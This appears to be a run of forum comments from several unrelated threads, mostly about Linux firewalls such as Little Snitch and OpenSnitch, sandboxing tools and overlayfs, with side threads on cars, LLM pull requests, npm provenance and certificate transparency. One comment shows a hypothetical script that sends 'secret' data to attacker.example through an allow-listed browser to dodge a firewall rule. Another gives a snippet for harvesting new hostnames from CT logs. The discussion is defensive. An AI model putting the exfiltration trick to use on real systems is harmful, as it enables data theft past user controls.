Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this model is very rare: most tools are either simply free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, or use an open-core model with paid add-ons.
I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
Many in the Linux crowd are slightly paranoid and ideological.
As a Linux user, I'm very reluctant to install anything proprietary that handles information as sensitive as my network traffic, and would rather use OpenSnitch or some other FOSS fork.
At the same time, I don't mind paying for open source; I donate several thousand USD per year to FOSS projects. But I guess I'm in a minority here, and if you make the whole stack open source you're not going to make many sales really.
You call it paranoia, I call it zero tolerance for enshittification.
It's like the Nazi bar problem. You need to be vigilant to prevent the thing you rely on becoming yet another platform for Microsoft to exfil your personal data to NSA servers.
As the author of Little Snitch for Linux, I can tell you what drives us: we are a small company where people (not investors) make the decisions. It was a personal choice of mine, driven by a gut feeling. I'm curious about the outcome...
The Wikipedia page for Little Snitch indicates that it's written in Objective-C. Is that still the case? Before going with the new implementation, did you attempt (or consider) porting the current codebase (using e.g. Cocotron or GNUstep libraries)? If so, how good or bad an experience was that?
Why is Little Snitch for Linux™ so hard to find from the company homepage[1] and the product page from the legacy app[2]?
Did the fact that you knew it was going to be made partially open source factor into your decision to develop a new, JS-and-DOM-based UI rather than having build targets for a shared, cross-platform codebase? (E.g. so that you wouldn't end up disclosing the source for the proprietary Mac version?)
Sorry, I overlooked that. I actually checked the license only far enough to see whether we could include it without other obligations, and then downloaded what was offered as a download on either the web site or GitHub, I can't remember. I decided for the minified version because it's smaller. That's the purpose of minification, after all.
It's somewhat strange that they require the license to be reproduced in every copy, but then offer a download without it. But anyway, I'll prepend the license to the next public release.
> I decided for the minified version because it's smaller. That's the purpose of minification, after all.
Mm... the purpose of minification, when it's not (also) being used for obfuscation purposes, is tied directly to the execution model of Web apps—constraints that don't apply for desktop applications (even if they are implemented in e.g. the same programming language or using the same or a similar runtime).
App makers and browser extension developers who shoehorn all of the (frankly already very bad or at least questionable) "best practices" associated with the tooling that was created to deal with creating/maintaining/delivering SPAs and other browser-based products into applications loaded from disk are just fundamentally not thinking things through.
For a security-sensitive application like this one, where a show of nothing-up-the-sleeve is only a benefit, one should expect there to be _no_ minified blobs in use.
I'll post in our blog about the development background later. The Linux version shares no code with the Mac version. Only concepts. It's written in Rust and JavaScript (for the Web UI).
Our site is primarily aimed at Mac users, and most visitors skim rather than read carefully. If the Linux package were more prominent, Mac users would likely click it, struggle to install it, and blame us for the confusion.
And regarding your third question: No. The decision was made when I wanted to run it on our headless servers.
As a paying customer, I wasn't expecting this so thank you! Can you expand more on your gut feeling? Also, I have different security expectations on Linux vs MacOS. Would you ever consider open sourcing the daemon?
It's hard to expand on the gut feeling. I wanted to have the app myself. Adding licensing to the code, limiting functionality for a demo mode, and then waiting to see whether Linux users would pay for it just did not feel right.
Regarding open-sourcing the daemon: the future is hard to predict, even more so with AI just having been invented. I would love to make it open source, but if you can feed it into Claude and tell it to convert it to a Mac version, we could lose our income.
For the moment, we prefer to keep it closed because we cannot estimate the consequences of making it open source.
When OpenSnitch already exists and is free and open source, a paid tool that does essentially the same thing with a slightly different (perhaps more polished) UI would be quite a hard sell.
Both for the obvious cost reason, but also because many of us don't like having code on our computers that we can't inspect, especially not in privileged positions like a firewall. I.e. I don't care much if a game or the Spotify app is closed source, but neither of those runs privileged; in fact I run them sandboxed (Flatpak).
I'm not a Little Snitch or Open Snitch user, but I wonder whether these firewalls are able to block requests made through some other, allow-listed program.
Say I run a script `suspicious.py` and I deny this script from making any network requests. I also have Firefox, which is allowed to make any HTTPS requests. What if suspicious.py does something like:
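Something along these lines (hypothetical script; the URL and data are made up):

```python
# suspicious.py (hypothetical): rather than opening a socket itself,
# the script delegates the request to an allow-listed browser, so the
# firewall attributes the connection to firefox, not to this script.
url = "https://attacker.example/collect?data=secret"  # made-up URL
cmd = ["firefox", url]
print("would run:", " ".join(cmd))
# subprocess.run(cmd) would hand the request to a process the
# firewall already trusts to make HTTPS connections
```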
It depends. Little Snitch for Linux has a two level namespace for processes. It takes the process doing the connection and its parent process into account when evaluating rules.
Also: if an interpreter is run via a `#!/bin/interpreter` line in the script, the rule is made for the script's file path, not the interpreter's. This does not work when running the script as `interpreter script`, though.
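A toy sketch of what two-level matching buys you (my own illustration, not Little Snitch's actual rule engine or rule format):

```python
# Toy illustration of two-level process matching: a rule can key on
# both the connecting process and its parent, so "python run by bash"
# and "python run by something else" can get different verdicts.
def evaluate(rules, process, parent):
    for rule_proc, rule_parent, verdict in rules:
        if rule_proc == process and rule_parent in (parent, "*"):
            return verdict
    return "ask"  # no rule matched: prompt the user

rules = [
    ("/usr/bin/python3", "/usr/bin/bash", "deny"),  # scripts run from a shell
    ("/usr/bin/firefox", "*", "allow"),             # browser always allowed
]

print(evaluate(rules, "/usr/bin/python3", "/usr/bin/bash"))  # deny
print(evaluate(rules, "/usr/bin/python3", "/usr/bin/cron"))  # ask
print(evaluate(rules, "/usr/bin/firefox", "/usr/bin/bash"))  # allow
```

With only single-level rules, the first two cases would be indistinguishable.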
With the literal rules described it would not be blocked. A more detailed rule (in Open Snitch at least, not as familiar with the other variants) could match e.g. whether the process's parent tree contained the python binary rather than just if python is the process binding the socket.
Not necessarily (with Open Snitch at least), it just depends how complex you want to make your firewall rules and what the specific goal is (block this specific script, block scripts which try to do this activity, block connection to evil.net, block python scripts, etc).
The more granular one gets, the more likely they aren't really asking how to do it in the firewall layer, though. E.g. if we take it further to wanting to prevent `python -c "specific logic"`, it's clearer that what you can do in the firewall is not necessarily the same as what's practical or useful.
The allow rule for Firefox is what would suppress the prompt. You probably don't want to have a prompt for every Firefox connection though, so you'd need to come up with some kind of ruleset (or get very annoyed :D).
This gets even more involved when you consider things like loading libraries, there's also the impact of calls like OpenProcess/WriteProcessMemory/CreateRemoteThread (Windows-land versions, though I'm sure similar exists elsewhere).
The "good" Windows firewalls like Outpost and Zone Alarm used to have features to catch this, they'd detect when a process tried to invoke or open a running process which had internet access. They'd also do things like detect when a process tried to write a startup item. This went by names like "Leak Control" but it was basically providing near-complete HIDS features with local control.
An SELinux MAC policy should restrict which files and ports each process may access. Most modern distros ship this feature, but normal users don't go through the rules training and default-enable setup. =3
Check also https://github.com/wrr/drop which is a higher-level tool than bwrap. It allows you to make such isolated sandboxes with minimal configuration.
This looks nice but I wouldn't trust a very fresh tool to do security correctly.
As a higher-level alternative to bwrap, I sometimes use `flatpak run --filesystem=$PWD --command=bash org.freedesktop.Platform`. This is kind of an abuse of flatpaks but works just fine to make a sandbox. And unlike bwrap, it has sane defaults (no extra permissions, not even network, though it does allow xdg-desktop-portal).
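For comparison, getting a similar sandbox out of bwrap directly takes something like this (a sketch; the exact binds vary by distro, which is part of why the "no sane defaults" complaint rings true):

```shell
# Minimal-ish bwrap sandbox: read-only system dirs, fresh /tmp,
# no network or other namespaces shared, current dir writable.
bwrap \
  --ro-bind /usr /usr \
  --symlink usr/bin /bin \
  --symlink usr/lib /lib \
  --proc /proc \
  --dev /dev \
  --tmpfs /tmp \
  --bind "$PWD" "$PWD" --chdir "$PWD" \
  --unshare-all \
  bash
```

Forget one `--ro-bind` and the shell won't start; grant one too many and the sandbox is weaker than intended.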
Shame it's not a bit more mature, it does look like more the sort of thing I want. I use firejail a bit, but it's a bit awkward really.
To be honest - and I can't really believe I'm saying it - what I really want is something more like Android permissions. (Except more granular file permissions, which Android doesn't do at all well.) Like: start with nothing, app is requesting x access, allow it this time; oh alright fine always allow it. Central place to manage it later. Etc.
The kernel is pretty much from scratch. It provides a FreeBSD compatible syscall interface for the syscalls that BEAM calls, as well as the FreeBSD runtime loader. I do make healthy use of FreeBSD libraries to provide the OS, you can get an idea of what I pull from the file names in the Makefile [1]. Building an OS is a lot, so I tried to stick to the parts I find fun and interesting. Things like a NIC driver in Erlang [2] (with NIFs to copy to/from device memory). But process / thread creation is original, memory management is original (not necessarily good), time keeping is original, etc. I used existing code and interfaces so I didn't have to write a bootloader, memcpy, and lots of other stuff.
DragonFlyBSD would be really interesting here as well since its kernel has Light Weight Kernel Threads that use message passing. Similar in shape to Erlang/BEAM. Though I guess you've built the kernel in Erlang... so wrong abstraction.
My kernel is in C. BEAM is in userspace. Most of the drivers are in userspace too. Turns out, if you let userspace mmap whatever address it wants to, and have access to all the i/o ports, plus have a way to hook interrupts, you can write drivers in userspace.
You could run beam as init with an existing kernel, but I wanted to explore something with less kernel.
In Europe there has always been a good selection of affordable, entry-level vehicles, but recently these affordable choices have largely vanished. The Toyota Corolla, the best-selling car in the world, is about 100% more expensive than pre-COVID. The Toyota Yaris, originally a small city car, has gotten bigger and more expensive. Basically, small city car options are disappearing. Short term, this is beneficial for carmakers, because they sell more expensive options with larger margins, but it creates a large gap to fill. Chinese manufacturers make a multitude of models at very competitive prices, and currently only taxes are keeping these models from dominating the markets. Long term, automakers must return to making affordable cars with smaller margins to survive.
I work on a sandboxing tool based on a similar idea of pointing the user's home dir to a separate location (https://github.com/wrr/drop). While I experimented with using overlayfs to isolate changes to the filesystem and it worked well as a proof of concept, the overlayfs specification is quite restrictive about how it can be mounted, to prevent undefined behavior.
I wonder if and how jai managed to address these limitations of overlayfs. Basically, the same dir should not be mounted as an overlayfs upper layer by different overlayfs mounts. If you run 'jai bash' twice in different terminals, do the two instances get two different writable home-dir overlays, or the same one? In the latter case, is the second 'jai bash' joining the mount namespace of the first one, or creating a new one with the same shared upper dir?
> Using an upper layer path and/or a workdir path that are already used by another overlay mount is not allowed and may fail with EBUSY. Using partially overlapping paths is not allowed and may fail with EBUSY. If files are accessed from two overlayfs mounts which share or overlap the upper layer and/or workdir path, the behavior of the overlay is undefined, though it will not result in a crash or deadlock.
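Concretely, the restriction means a sequence like this (paths hypothetical, requires root) is expected to fail on the second mount:

```shell
mkdir -p lower upper work1 work2 merged1 merged2
# First overlay mount claims 'upper' as its upper layer:
sudo mount -t overlay overlay \
  -o lowerdir=lower,upperdir=upper,workdir=work1 merged1
# A second mount reusing the same upperdir is rejected (EBUSY):
sudo mount -t overlay overlay \
  -o lowerdir=lower,upperdir=upper,workdir=work2 merged2
```

So a tool like drop or jai has to either give each instance its own upper dir, or share a single mount (e.g. by joining the first instance's mount namespace).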
If the author of a PR just generated code with an LLM, the GitHub PR becomes an incredibly inefficient interface between the repository owner and the LLM. A much better use of the owner's time would be to interact with the LLM directly instead of responding to an LLM-generated PR, waiting for updates, responding again, etc.
As a project maintainer, I don't want to interact with someone's LLM. If a person submits a PR, using an LLM or not, the person is responsible for any problems with it. How they respond to review is a good indicator of whether they actually understand the code. And if they used a bot to submit the PR, I'd simply consider it spam.
Yep, the indirection through the PR author is almost always inefficient and error-prone unless the author is really knowledgeable about the code (many aren't).
This is also very detrimental to the buyer experience. When you search for a specific new product, prices from different sellers can vary widely, and most often there is no way to tell the reason for the difference. Is the cheapest offer simply the best deal, or is it a refurbished product, or even a fake?
An extension from a trusted, non-anonymous developer, released as open source, is a good signal that the extension can be trusted. But keep in mind that distribution channels for browser extensions, like distribution channels for most other open-source packages (pip, npm, rpm), do not provide any guarantee that the package you install and run is actually built verbatim from the code that is open sourced.
Actually, npm supports "provenance", and since it eliminated long-lived access tokens for publishing, it encourages people to use "trusted publishing", which over time should make the majority of packages auto-provenance-verified.
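For what it's worth, both sides of that flow are plain npm CLI commands (assuming a reasonably recent npm and a CI provider npm supports for provenance, e.g. GitHub Actions):

```shell
# Publisher side, from CI: attach an attestation linking the
# published tarball to the source repo and build workflow.
npm publish --provenance

# Consumer side, in a project with node_modules installed: verify
# registry signatures and provenance attestations for dependencies.
npm audit signatures
```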
Unless the Chrome web store integrates with this, it puts the onus on users to continuously scan extension updates for hash mismatches with the public extension builds, which isn’t standardized. And even then this would be after an update is unpacked, which may not run in time to prevent initial execution. Nor does it prevent a supply chain attack on the code running in the GitHub Action for the build, especially if dependencies aren’t pinned. There’s no free lunch here.
If the RPM/deb comes from a Linux distribution then there is a good chance there is a separate maintainer and the binary package is always built from the source code by the distro.
Also if the upstream developer goes malicious there is a good chance at least one of the distro maintainers will notice and both prevent the bad source code being built for the distro & notify others.
I have investigated similar situation on Heroku. Heroku assigns a random subdomain suffix for each new app, so URLs of apps are hard to guess and look like this: test-app-28a8490db018.herokuapp.com.
I have noticed that as soon as a new Heroku app is created, without making any requests to the app that could leak the URL via a DNS lookup, the app is hit by requests from automatic vulnerability scanning tools. Heroku confirmed that this is due to the new app URL being published in certificate authority logs, which are actively monitored by vulnerability scanners.
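This is easy to reproduce yourself; a minimal sketch of the scanner side against crt.sh's public JSON endpoint (the endpoint shape is an assumption based on its search form, and rate limits apply):

```python
# Sketch of how scanners harvest fresh hostnames from CT logs, using
# crt.sh's JSON search interface (no auth required).
import json
import urllib.parse
import urllib.request

def ct_query_url(pattern: str) -> str:
    return "https://crt.sh/?output=json&q=" + urllib.parse.quote(pattern)

def ct_hostnames(pattern: str) -> set[str]:
    with urllib.request.urlopen(ct_query_url(pattern), timeout=30) as resp:
        rows = json.load(resp)
    # name_value can contain several newline-separated SAN entries
    return {name for row in rows for name in row["name_value"].splitlines()}

print(ct_query_url("%.herokuapp.com"))
# ct_hostnames("%.herokuapp.com") would return recently logged app
# hostnames, ready to feed straight into a scanner.
```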
> certificate authority logs, which are actively monitored by vulnerability scanners
That sounds like a large kick-me sign taped to every new service. Reading how certificate transparency (CT) works leads me to think that there was a missed opportunity to publish hashes to the logs instead of the actual certificate data. That way a browser performing a certificate check can verify in CT, but a spammer can't monitor CT for new domains.
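A toy model of that hash-publishing idea (purely a sketch of the concept, not a real CT design):

```python
# Toy "translucent" CT log: the log stores only digests, so a browser
# holding a certificate can check inclusion, but a crawler reading
# the log learns no hostnames.
import hashlib

def log_entry(cert_der: bytes) -> str:
    return hashlib.sha256(cert_der).hexdigest()

log = set()

# CA side: submit only the hash at issuance time.
cert = b"DER bytes of cert for test-app-28a8490db018.herokuapp.com"
log.add(log_entry(cert))

# Browser side: it already holds the full certificate, so it can
# recompute the digest and check membership.
assert log_entry(cert) in log

# Crawler side: all it sees is opaque digests, no domain names.
print("log contains", len(log), "opaque entries")
```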
I think it was more of an intentional tradeoff, as one of the many goals of CT logs was to allow domain owners to discover certificates issued for their domains, or more generally for any interested party to audit the activity of a certificate authority.
What you're describing there is certificate... translucency, I guess?
Yes, "translucent database" was exactly the concept I was thinking of when asking the question. The idea is to keep access to specific items easy while making access to the entire thing as a whole more costly.
This applies only to Heroku Fir and Cedar apps (apps that run in Heroku Private Spaces). Heroku Common Runtime apps still use shared wildcard certificate and their domains are not discoverable like this.